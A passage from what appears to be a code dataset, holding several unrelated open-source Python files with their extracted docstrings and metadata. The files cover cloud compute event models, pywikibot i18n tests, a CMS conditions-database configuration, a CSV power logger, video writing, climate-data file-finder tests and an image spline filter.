kwarg_map = {'bw_in': 'bw_in',
'bw_out': 'bw_out'}
def __init__(self, bw_in, bw_out):
super(BandwidthInterface, self).__init__(locals())
class FixedIp(EventBaseModel):
"""Fixed IP Response Model
@summary: Response model for a fixed IP address from a
compute event notification
@note: Represents a single fixed IP
JSON Example:
{
"address": "10.10.0.0",
"floating_ips": [],
"label": "public",
"meta": {},
"type": "fixed",
"version": 4,
"vif_mac": "FE:ED:FA:00:1C:D4"
}
"""
kwarg_map = {
'address': 'address',
'floating_ips': 'floating_ips',
'label': 'label',
'meta': 'meta',
'type_': 'type',
'version': 'version',
'vif_mac': 'vif_mac'}
def __init__(self, address, floating_ips, label, meta, type_, version,
vif_mac):
super(FixedIp, self).__init__(locals())
class FixedIps(EventBaseListModel):
"""Fixed IPs Model
@summary: Response model for a list of fixed IP addresses
from a compute event notification
@note: Returns a list of elements of type 'FixedIp'
JSON Example:
{
"fixed_ips": [
{ <FixedIp> },
{ <FixedIp> }
]
}
"""
list_model_key = 'fixed_ips'
ObjectModel = FixedIp
class ImageMeta(EventBaseModel):
"""Image Metadata Model
@summary: Response model for image metadata from a compute
event notification
@note: This type may contain additional unspecified
fields, which will be captured in a dictionary called kwargs
JSON Example:
{
"image_meta": {
"auto_disk_config": "disabled",
"base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"container_format": "ovf",
"disk_format": "vhd",
"image_type": "base",
"min_disk": "20",
"min_ram": "512",
"org.openstack__1__architecture": "x64",
"org.openstack__1__os_distro": "com.ubuntu",
"org.openstack__1__os_version": "12.04",
"os_type": "linux"
}
}
"""
kwarg_map = {
'auto_disk_config': 'auto_disk_config',
'base_image_ref': 'base_image_ref',
'container_format': 'container_format',
'disk_format': 'disk_format',
'image_type': 'image_type',
'min_disk': 'min_disk',
'min_ram': 'min_ram',
'org_openstack__1__architecture': 'org.openstack__1__architecture',
'org_openstack__1__os_distro': 'org.openstack__1__os_distro',
'org_openstack__1__os_version': 'org.openstack__1__os_version',
'os_type': 'os_type'}
strict_checking = False
def __init__(self, auto_disk_config, base_image_ref, container_format,
disk_format, image_type, min_disk, min_ram,
org_openstack__1__architecture, org_openstack__1__os_distro,
org_openstack__1__os_version, os_type, **kwargs):
super(ImageMeta, self).__init__(locals())
class InstanceException(EventBaseModel):
"""Instance Exception Model
@summary: Response model for an instance exception from a
compute event notification
@note: Represents a single instance exception
JSON Example:
{
"exception": {
"kwargs": {
"instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"reason": "Something broke",
"code": 500
}
}
}
"""
kwarg_map = {'kwargs': 'kwargs'}
def __init__(self, kwargs):
super(InstanceException, self).__init__(locals())
| cloudcafe/events/models/compute/common.py | 6,212 | Bandwidth Response Model
@summary: Response model for bandwidth from a compute
event notification
@note: Although the 'public' and 'private' interfaces are
not required, they are the most common names, and are
included as optional attributes for the sake of convenience
@note: This type may contain additional unspecified
BandwidthInterface fields, which will be captured in a
dictionary called kwargs
JSON Example:
{
"private": { <BandwidthInterface> },
"public": { <BandwidthInterface> }
}
Bandwidth Interface Response Model
@summary: Response model for bandwidth on an interface from
a compute event notification
@note: Sub-model of Bandwidth
JSON Example:
{
"bw_in": 123456,
"bw_out": 654321
}
Fixed IP Response Model
@summary: Response model for a fixed IP address from a
compute event notification
@note: Represents a single fixed IP
JSON Example:
{
"address": "10.10.0.0",
"floating_ips": [],
"label": "public",
"meta": {},
"type": "fixed",
"version": 4,
"vif_mac": "FE:ED:FA:00:1C:D4"
}
Fixed IPs Model
@summary: Response model for a list of fixed IP addresses
from a compute event notification
@note: Returns a list of elements of type 'FixedIp'
JSON Example:
{
"fixed_ips": [
{ <FixedIp> },
{ <FixedIp> }
]
}
Image Metadata Model
@summary: Response model for image metadata from a compute
event notification
@note: This type may contain additional unspecified
fields, which will be captured in a dictionary called kwargs
JSON Example:
{
"image_meta": {
"auto_disk_config": "disabled",
"base_image_ref": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"container_format": "ovf",
"disk_format": "vhd",
"image_type": "base",
"min_disk": "20",
"min_ram": "512",
"org.openstack__1__architecture": "x64",
"org.openstack__1__os_distro": "com.ubuntu",
"org.openstack__1__os_version": "12.04",
"os_type": "linux"
}
}
Instance Exception Model
@summary: Response model for an instance exception from a
compute event notification
@note: Represents a single instance exception
JSON Example:
{
"exception": {
"kwargs": {
"instance_uuid": "5e91ad7f-afe4-4a83-bd5f-84673462cae1",
"reason": "Something broke",
"code": 500
}
}
}
Override dict_to_obj implementation
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. | 3,166 | en | 0.743016 |
# -*- coding: utf-8 -*-
"""Test i18n module."""
#
# (C) Pywikibot team, 2007-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id: 791a455ab0a66f7bafcfb71718f915c9dd7b7ab2 $'
import sys
import pywikibot
from pywikibot import i18n, bot, plural
from tests.aspects import unittest, TestCase, DefaultSiteTestCase, PwbTestCase
if sys.version_info[0] == 3:
basestring = (str, )
class TestTranslate(TestCase):
"""Test translate method."""
net = False
def setUp(self):
self.msg_localized = {'en': u'test-localized EN',
'nl': u'test-localized NL',
'fy': u'test-localized FY'}
self.msg_semi_localized = {'en': u'test-semi-localized EN',
'nl': u'test-semi-localized NL'}
self.msg_non_localized = {'en': u'test-non-localized EN'}
self.msg_no_english = {'ja': u'test-no-english JA'}
super(TestTranslate, self).setUp()
def testLocalized(self):
self.assertEqual(i18n.translate('en', self.msg_localized,
fallback=True),
u'test-localized EN')
self.assertEqual(i18n.translate('nl', self.msg_localized,
fallback=True),
u'test-localized NL')
self.assertEqual(i18n.translate('fy', self.msg_localized,
fallback=True),
u'test-localized FY')
def testSemiLocalized(self):
self.assertEqual(i18n.translate('en', self.msg_semi_localized,
fallback=True),
u'test-semi-localized EN')
self.assertEqual(i18n.translate('nl', self.msg_semi_localized,
fallback=True),
u'test-semi-localized NL')
self.assertEqual(i18n.translate('fy', self.msg_semi_localized,
fallback=True),
u'test-semi-localized NL')
def testNonLocalized(self):
self.assertEqual(i18n.translate('en', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
self.assertEqual(i18n.translate('fy', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
self.assertEqual(i18n.translate('nl', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
self.assertEqual(i18n.translate('ru', self.msg_non_localized,
fallback=True),
u'test-non-localized EN')
def testNoEnglish(self):
self.assertEqual(i18n.translate('en', self.msg_no_english,
fallback=True),
u'test-no-english JA')
self.assertEqual(i18n.translate('fy', self.msg_no_english,
fallback=True),
u'test-no-english JA')
self.assertEqual(i18n.translate('nl', self.msg_no_english,
fallback=True),
u'test-no-english JA')
class UserInterfaceLangTestCase(TestCase):
"""Base class for tests using config.userinterface_lang."""
def setUp(self):
super(UserInterfaceLangTestCase, self).setUp()
self.orig_userinterface_lang = pywikibot.config.userinterface_lang
pywikibot.config.userinterface_lang = self.get_site().code
def tearDown(self):
pywikibot.config.userinterface_lang = self.orig_userinterface_lang
super(UserInterfaceLangTestCase, self).tearDown()
class TWNSetMessagePackageBase(TestCase):
"""Partial base class for TranslateWiki tests."""
message_package = None
def setUp(self):
self.orig_messages_package_name = i18n._messages_package_name
i18n.set_messages_package(self.message_package)
super(TWNSetMessagePackageBase, self).setUp()
def tearDown(self):
super(TWNSetMessagePackageBase, self).tearDown()
i18n.set_messages_package(self.orig_messages_package_name)
class TWNTestCaseBase(TWNSetMessagePackageBase):
"""Base class for TranslateWiki tests."""
@classmethod
def setUpClass(cls):
if not isinstance(cls.message_package, basestring):
raise TypeError('%s.message_package must be a package name'
% cls.__name__)
# Th call to set_messages_package below exists only to confirm
# that the package exists and messages are available, so
# that tests can be skipped if the i18n data doesnt exist.
cls.orig_messages_package_name = i18n._messages_package_name
i18n.set_messages_package(cls.message_package)
has_messages = i18n.messages_available()
i18n._messages_package_name = cls.orig_messages_package_name
if not has_messages:
raise unittest.SkipTest("i18n messages package '%s' not available."
% cls.message_package)
super(TWNTestCaseBase, cls).setUpClass()
class TestTWTranslate(TWNTestCaseBase):
"""Test twtranslate method."""
net = False
message_package = 'tests.i18n'
def testLocalized(self):
self.assertEqual(i18n.twtranslate('en', 'test-localized'),
u'test-localized EN')
self.assertEqual(i18n.twtranslate('nl', 'test-localized'),
u'test-localized NL')
self.assertEqual(i18n.twtranslate('fy', 'test-localized'),
u'test-localized FY')
def testSemiLocalized(self):
self.assertEqual(i18n.twtranslate('en', 'test-semi-localized'),
u'test-semi-localized EN')
self.assertEqual(i18n.twtranslate('nl', 'test-semi-localized'),
u'test-semi-localized NL')
self.assertEqual(i18n.twtranslate('fy', 'test-semi-localized'),
u'test-semi-localized NL')
def testNonLocalized(self):
self.assertEqual(i18n.twtranslate('en', 'test-non-localized'),
u'test-non-localized EN')
self.assertEqual(i18n.twtranslate('fy', 'test-non-localized'),
u'test-non-localized EN')
self.assertEqual(i18n.twtranslate('nl', 'test-non-localized'),
u'test-non-localized EN')
self.assertEqual(i18n.twtranslate('ru', 'test-non-localized'),
u'test-non-localized EN')
def testNoEnglish(self):
self.assertRaises(i18n.TranslationError, i18n.twtranslate,
'en', 'test-no-english')
class TestTWNTranslate(TWNTestCaseBase):
"""Test {{PLURAL:}} support."""
net = False
message_package = 'tests.i18n'
def testNumber(self):
"""Use a number."""
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 0) % {'num': 0},
u'Bot: Ändere 0 Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 1) % {'num': 1},
u'Bot: Ändere 1 Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 2) % {'num': 2},
u'Bot: Ändere 2 Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-plural', 3) % {'num': 3},
u'Bot: Ändere 3 Seiten.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 0) % {'num': 'no'},
u'Bot: Changing no pages.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 1) % {'num': 'one'},
u'Bot: Changing one page.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 2) % {'num': 'two'},
u'Bot: Changing two pages.')
self.assertEqual(
i18n.twntranslate('en', 'test-plural', 3) % {'num': 'three'},
u'Bot: Changing three pages.')
def testString(self):
"""Use a string."""
self.assertEqual(
i18n.twntranslate('en', 'test-plural', '1') % {'num': 'one'},
u'Bot: Changing one page.')
def testDict(self):
"""Use a dictionary."""
self.assertEqual(
i18n.twntranslate('en', 'test-plural', {'num': 2}),
u'Bot: Changing 2 pages.')
def testExtended(self):
"""Use additional format strings."""
self.assertEqual(
i18n.twntranslate('fr', 'test-plural', {'num': 1, 'descr': 'seulement'}),
u'Robot: Changer seulement une page.')
def testExtendedOutside(self):
"""Use additional format strings also outside."""
self.assertEqual(
i18n.twntranslate('fr', 'test-plural', 1) % {'descr': 'seulement'},
u'Robot: Changer seulement une page.')
def testMultiple(self):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', 1)
% {'action': u'Ändere', 'line': u'eine'},
u'Bot: Ändere eine Zeile von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', 2)
% {'action': u'Ändere', 'line': u'zwei'},
u'Bot: Ändere zwei Zeilen von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', 3)
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', (1, 2, 2))
% {'action': u'Ändere', 'line': u'eine'},
u'Bot: Ändere eine Zeile von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', [3, 1, 1])
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', ["3", 1, 1])
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', "321")
% {'action': u'Ändere', 'line': u'dreihunderteinundzwanzig'},
u'Bot: Ändere dreihunderteinundzwanzig Zeilen von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': 1, 'page': 1}),
u'Bot: Ändere 1 Zeile von einer Seite.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': 1, 'page': 2}),
u'Bot: Ändere 1 Zeile von mehreren Seiten.')
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': "11", 'page': 2}),
u'Bot: Ändere 11 Zeilen von mehreren Seiten.')
def testMultipleWrongParameterLength(self):
"""Test wrong parameter length."""
with self.assertRaisesRegex(ValueError, "Length of parameter does not match PLURAL occurrences"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', (1, 2))
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von mehreren Seiten.')
with self.assertRaisesRegex(ValueError, "Length of parameter does not match PLURAL occurrences"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', ["321"])
% {'action': u'Ändere', 'line': u'dreihunderteinundzwanzig'},
u'Bot: Ändere dreihunderteinundzwanzig Zeilen von mehreren Seiten.')
def testMultipleNonNumbers(self):
"""Test error handling for multiple non-numbers."""
with self.assertRaisesRegex(ValueError, "invalid literal for int\(\) with base 10: 'drei'"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals', ["drei", "1", 1])
% {'action': u'Ändere', 'line': u'drei'},
u'Bot: Ändere drei Zeilen von einer Seite.')
with self.assertRaisesRegex(ValueError, "invalid literal for int\(\) with base 10: 'elf'"):
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'action': u'Ändere', 'line': "elf", 'page': 2}),
u'Bot: Ändere elf Zeilen von mehreren Seiten.')
def testAllParametersExist(self):
with self.assertRaisesRegex(KeyError, repr(u'line')):
# all parameters must be inside twntranslate
self.assertEqual(
i18n.twntranslate('de', 'test-multiple-plurals',
{'line': 1, 'page': 1})
% {'action': u'Ändere'},
u'Bot: Ändere 1 Zeile von einer Seite.')
def test_fallback_lang(self):
"""
Test that twntranslate uses the translation's language.
twntranslate calls _twtranslate which might return the translation for
a different language and then the plural rules from that language need
to be applied.
"""
# co has fr as altlang but has no plural rules defined (otherwise this
# test might not catch problems) so it's using the plural variant for 0
# although French uses the plural variant for numbers > 1 (so not 0)
assert 'co' not in plural.plural_rules
assert plural.plural_rules['fr']['plural'](0) is False
self.assertEqual(
i18n.twntranslate('co', 'test-plural', {'num': 0, 'descr': 'seulement'}),
u'Robot: Changer seulement une page.')
self.assertEqual(
i18n.twntranslate('co', 'test-plural', {'num': 1, 'descr': 'seulement'}),
u'Robot: Changer seulement une page.')
class ScriptMessagesTestCase(TWNTestCaseBase):
"""Real messages test."""
net = False
message_package = 'scripts.i18n'
def test_basic(self):
"""Verify that real messages are able to be loaded."""
self.assertEqual(i18n.twntranslate('en', 'pywikibot-enter-new-text'),
'Please enter the new text:')
def test_missing(self):
"""Test a missing message from a real message bundle."""
self.assertRaises(i18n.TranslationError,
i18n.twntranslate, 'en', 'pywikibot-missing-key')
class InputTestCase(TWNTestCaseBase, UserInterfaceLangTestCase, PwbTestCase):
"""Test i18n.input."""
family = 'wikipedia'
code = 'arz'
message_package = 'scripts.i18n'
@classmethod
def setUpClass(cls):
if cls.code in i18n.twget_keys('pywikibot-enter-category-name'):
raise unittest.SkipTest(
'%s has a translation for %s'
% (cls.code, 'pywikibot-enter-category-name'))
super(InputTestCase, cls).setUpClass()
def test_pagegen_i18n_input(self):
"""Test i18n.input via ."""
result = self._execute(args=['listpages', '-cat'],
data_in='non-existant-category\n',
timeout=5)
self.assertIn('Please enter the category name:', result['stderr'])
class MissingPackageTestCase(TWNSetMessagePackageBase,
UserInterfaceLangTestCase,
DefaultSiteTestCase):
"""Test misssing messages package."""
message_package = 'scripts.foobar.i18n'
def _capture_output(self, text, *args, **kwargs):
self.output_text = text
def setUp(self):
super(MissingPackageTestCase, self).setUp()
self.output_text = ''
self.orig_raw_input = bot.ui._raw_input
self.orig_output = bot.ui.output
bot.ui._raw_input = lambda *args, **kwargs: 'dummy input'
bot.ui.output = self._capture_output
def tearDown(self):
bot.ui._raw_input = self.orig_raw_input
bot.ui.output = self.orig_output
super(MissingPackageTestCase, self).tearDown()
def test_pagegen_i18n_input(self):
"""Test i18n.input falls back with missing message package."""
rv = i18n.input('pywikibot-enter-category-name',
fallback_prompt='dummy output')
self.assertEqual(rv, 'dummy input')
self.assertIn('dummy output: ', self.output_text)
if __name__ == '__main__':
try:
unittest.main()
except SystemExit:
pass
| tests/i18n_tests.py | 16,847 | Test i18n.input.
Test misssing messages package.
Real messages test.
Partial base class for TranslateWiki tests.
Base class for TranslateWiki tests.
Test {{PLURAL:}} support.
Test twtranslate method.
Test translate method.
Base class for tests using config.userinterface_lang.
Use a dictionary.
Use additional format strings.
Use additional format strings also outside.
Test error handling for multiple non-numbers.
Test wrong parameter length.
Use a number.
Use a string.
Verify that real messages are able to be loaded.
Test that twntranslate uses the translation's language.
twntranslate calls _twtranslate which might return the translation for
a different language and then the plural rules from that language need
to be applied.
Test a missing message from a real message bundle.
Test i18n.input via .
Test i18n.input falls back with missing message package.
Test i18n module.
-*- coding: utf-8 -*- (C) Pywikibot team, 2007-2014 Distributed under the terms of the MIT license. Th call to set_messages_package below exists only to confirm that the package exists and messages are available, so that tests can be skipped if the i18n data doesnt exist. all parameters must be inside twntranslate co has fr as altlang but has no plural rules defined (otherwise this test might not catch problems) so it's using the plural variant for 0 although French uses the plural variant for numbers > 1 (so not 0) | 1,408 | en | 0.686094 |
import socket
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
process = cms.Process("LHCInfoPopulator")
from CondCore.CondDB.CondDB_cfi import *
#process.load("CondCore.DBCommon.CondDBCommon_cfi")
#process.CondDBCommon.connect = 'sqlite_file:lhcinfo_pop_test.db'
#process.CondDBCommon.DBParameters.authenticationPath = '.'
#process.CondDBCommon.DBParameters.messageLevel=cms.untracked.int32(1)
sourceConnection = 'oracle://cms_omds_adg/CMS_RUNINFO_R'
if socket.getfqdn().find('.cms') != -1:
sourceConnection = 'oracle://cms_omds_lb/CMS_RUNINFO_R'
options = VarParsing.VarParsing()
options.register( 'destinationConnection'
, 'sqlite_file:lhcinfo_pop_test.db' #default value
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.string
, "Connection string to the DB where payloads will be possibly written."
)
options.register( 'targetConnection'
, '' #default value
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.string
, """Connection string to the target DB:
if not empty (default), this provides the latest IOV and payloads to compare;
it is the DB where payloads should be finally uploaded."""
)
options.register( 'tag'
, 'LHCInfo_PopCon_start_test'
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.string
, "Tag written in destinationConnection and finally appended in targetConnection."
)
options.register( 'messageLevel'
, 0 #default value
, VarParsing.VarParsing.multiplicity.singleton
, VarParsing.VarParsing.varType.int
, "Message level; default to 0"
)
options.parseArguments()
CondDBConnection = CondDB.clone( connect = cms.string( options.destinationConnection ) )
CondDBConnection.DBParameters.messageLevel = cms.untracked.int32( options.messageLevel )
process.MessageLogger = cms.Service("MessageLogger",
cout = cms.untracked.PSet(threshold = cms.untracked.string('INFO')),
destinations = cms.untracked.vstring('cout')
)
process.source = cms.Source("EmptyIOVSource",
lastValue = cms.uint64(1),
timetype = cms.string('runnumber'),
firstValue = cms.uint64(1),
interval = cms.uint64(1)
)
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
CondDBConnection,
timetype = cms.untracked.string('timestamp'),
toPut = cms.VPSet(cms.PSet(record = cms.string('LHCInfoRcd'),
tag = cms.string( options.tag )
)
)
)
process.Test1 = cms.EDAnalyzer("LHCInfoPopConAnalyzer",
SinceAppendMode = cms.bool(True),
record = cms.string('LHCInfoRcd'),
name = cms.untracked.string('LHCInfo'),
Source = cms.PSet(fill = cms.untracked.uint32(6417),
startTime = cms.untracked.string('2018-04-01 00:00:00.000'),
#endTime = cms.untracked.string('2018-03-25 05:00:00.000'),
samplingInterval = cms.untracked.uint32( 600 ),
endFill = cms.untracked.bool(False),
connectionString = cms.untracked.string("oracle://cms_orcon_adg/CMS_RUNTIME_LOGGER"),
ecalConnectionString = cms.untracked.string("oracle://cms_orcon_adg/CMS_DCS_ENV_PVSS_COND"),
DIPSchema = cms.untracked.string("CMS_BEAM_COND"),
omsBaseUrl = cms.untracked.string("http://vocms0184.cern.ch/agg/api/v1"),
#authenticationPath = cms.untracked.string("."),
debug=cms.untracked.bool(False)
),
loggingOn = cms.untracked.bool(True),
IsDestDbCheckedInQueryLog = cms.untracked.bool(False)
)
process.p = cms.Path(process.Test1)
| CondTools/RunInfo/python/LHCInfoPopConAnalyzerStartFill.py | 4,917 | process.load("CondCore.DBCommon.CondDBCommon_cfi")process.CondDBCommon.connect = 'sqlite_file:lhcinfo_pop_test.db'process.CondDBCommon.DBParameters.authenticationPath = '.'process.CondDBCommon.DBParameters.messageLevel=cms.untracked.int32(1)default valuedefault valuedefault valueendTime = cms.untracked.string('2018-03-25 05:00:00.000'),authenticationPath = cms.untracked.string("."), | 386 | en | 0.197523 |
"""
CSVLogger writes power values to a csv file.
"""
__author__ = 'Md Shifuddin Al Masud'
__email__ = 'shifuddin.masud@gmail.com'
__license__ = 'MIT License'
from pv_simulator.FileWriter import FileWriter
import csv
from datetime import datetime
import aiofiles
from aiocsv import AsyncWriter
import logging
class CSVFileWriter(FileWriter):
__destination = ""
def __init__(self, destination):
"""
:param destination:
"""
self.__destination = destination
async def write(self, timestamp: datetime, meter_power_value: int, simulator_power_value: int,
combined_power_value: int) -> None:
"""
Writes values into a csv file
:param timestamp:
:param meter_power_value:
:param simulator_power_value:
:param combined_power_value:
:return:
"""
async with aiofiles.open(self.__destination, mode='a') as csv_file:
csv_file_writer = AsyncWriter(csv_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
await csv_file_writer.writerow([datetime.now(), meter_power_value, simulator_power_value,
combined_power_value])
logging.debug("%s, %s, %s, %s are writen to %s", datetime.now(), meter_power_value, simulator_power_value,
combined_power_value, self.__destination)
| pv_simulator/CSVFileWriter.py | 1,401 | :param destination:
CSVLogger writes power values to a csv file. | 64 | en | 0.581016 |
'''
This function takes in index_list, data_path , save_path as the arguments. It writes a video consisting
of the frame in data_path into save_path and writes a text file with the indexed of the representative
frame into the same directory
inputs :
- frames = list of frames i.e. numpy arrays
- scale = scale to resize, int
- data_path = path to original data, string
- save_original_path = path to save scaled video, string
- Detrac = For development purposes only, True
outputs : None
'''
import cv2
import os
import imageio
from glob import glob
from tqdm import tqdm
def write_original_video(frames, scale=1 , data_path='', save_original_path='' ,Detrac = False):
if Detrac:
c = 0
width = 960
height = 540
fourcc = cv2.VideoWriter_fourcc(*'MP42')
for i in os.listdir('DETRAC-Images/'):
video = cv2.VideoWriter('./DETRAC_video.avi',fourcc,30, (width,height))
for j in range(1, len(os.listdir('DETRAC-Images/' + i + '/'))+1):
j = str(j)
jj= 5-len(j)
k = "img" + jj*"0" +j +".jpg"
img = imageio.imread('DETRAC-Images/' + i + '/' + k + '/')
video.write(img)
video.release()
cv2.destroyAllWindows()
break
video.release()
cv2.destroyAllWindows()
else:
c = 0
fourcc = cv2.VideoWriter_fourcc(*'MP42')
if type(scale) == tuple:
width = scale[1]
height = scale[0]
else:
cap = cv2.VideoCapture(data_path)
ret, img_for_shape = cap.read()
cap.release()
width = float(scale) * int(img_for_shape.shape[1])
height = float(scale) * int(img_for_shape.shape[0])
width = int(width)
height = int(height)
video = cv2.VideoWriter(save_original_path,fourcc,30, (width,height))
print()
for img in tqdm(list(frames)):
img = cv2.resize( img , (width, height))
video.write(img)
video.release()
cv2.destroyAllWindows()
| storage/compression/write_original_video.py | 2,302 | This function takes in index_list, data_path , save_path as the arguments. It writes a video consisting
of the frame in data_path into save_path and writes a text file with the indexed of the representative
frame into the same directory
inputs :
- frames = list of frames i.e. numpy arrays
- scale = scale to resize, int
- data_path = path to original data, string
- save_original_path = path to save scaled video, string
- Detrac = For development purposes only, True
outputs : None | 513 | en | 0.781772 |
"""Tests for _data_finder.py."""
import os
import shutil
import tempfile
import pytest
import yaml
import esmvalcore._config
from esmvalcore._data_finder import (get_input_filelist, get_input_fx_filelist,
get_output_file)
from esmvalcore.cmor.table import read_cmor_tables
# Initialize with standard config developer file
esmvalcore._config.CFG = esmvalcore._config.read_config_developer_file()
# Initialize CMOR tables
read_cmor_tables(esmvalcore._config.CFG)
# Load test configuration
with open(os.path.join(os.path.dirname(__file__), 'data_finder.yml')) as file:
CONFIG = yaml.safe_load(file)
def print_path(path):
"""Print path."""
txt = path
if os.path.isdir(path):
txt += '/'
if os.path.islink(path):
txt += ' -> ' + os.readlink(path)
print(txt)
def tree(path):
"""Print path, similar to the the `tree` command."""
print_path(path)
for dirpath, dirnames, filenames in os.walk(path):
for dirname in dirnames:
print_path(os.path.join(dirpath, dirname))
for filename in filenames:
print_path(os.path.join(dirpath, filename))
def create_file(filename):
"""Create an empty file."""
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(filename, 'a'):
pass
def create_tree(path, filenames=None, symlinks=None):
"""Create directory structure and files."""
for filename in filenames or []:
create_file(os.path.join(path, filename))
for symlink in symlinks or []:
link_name = os.path.join(path, symlink['link_name'])
os.symlink(symlink['target'], link_name)
@pytest.mark.parametrize('cfg', CONFIG['get_output_file'])
def test_get_output_file(cfg):
"""Test getting output name for preprocessed files."""
output_file = get_output_file(cfg['variable'], cfg['preproc_dir'])
assert output_file == cfg['output_file']
@pytest.fixture
def root():
"""Root function for tests."""
dirname = tempfile.mkdtemp()
yield os.path.join(dirname, 'output1')
print("Directory structure was:")
tree(dirname)
shutil.rmtree(dirname)
@pytest.mark.parametrize('cfg', CONFIG['get_input_filelist'])
def test_get_input_filelist(root, cfg):
"""Test retrieving input filelist."""
create_tree(root, cfg.get('available_files'),
cfg.get('available_symlinks'))
# Find files
rootpath = {cfg['variable']['project']: [root]}
drs = {cfg['variable']['project']: cfg['drs']}
input_filelist = get_input_filelist(cfg['variable'], rootpath, drs)
# Test result
reference = [os.path.join(root, file) for file in cfg['found_files']]
assert sorted(input_filelist) == sorted(reference)
@pytest.mark.parametrize('cfg', CONFIG['get_input_fx_filelist'])
def test_get_input_fx_filelist(root, cfg):
"""Test retrieving fx filelist."""
create_tree(root, cfg.get('available_files'),
cfg.get('available_symlinks'))
# Find files
rootpath = {cfg['variable']['project']: [root]}
drs = {cfg['variable']['project']: cfg['drs']}
fx_files = get_input_fx_filelist(cfg['variable'], rootpath, drs)
# Test result
reference = {
fx_var: os.path.join(root, filename) if filename else None
for fx_var, filename in cfg['found_files'].items()
}
assert fx_files == reference
| tests/integration/test_data_finder.py | 3,425 | Create an empty file.
Create directory structure and files.
Print path.
Root function for tests.
Test retrieving input filelist.
Test retrieving fx filelist.
Test getting output name for preprocessed files.
Print path, similar to the the `tree` command.
Tests for _data_finder.py.
Initialize with standard config developer file Initialize CMOR tables Load test configuration Find files Test result Find files Test result | 422 | en | 0.599473 |
# Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import numpy
from . import _ni_support
from kapteyn import _nd_image
def _extend_mode_to_code(mode):
mode = _ni_support._extend_mode_to_code(mode)
return mode
def spline_filter1d(input, order = 3, axis = -1, output = numpy.float64,
output_type = None):
"""Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
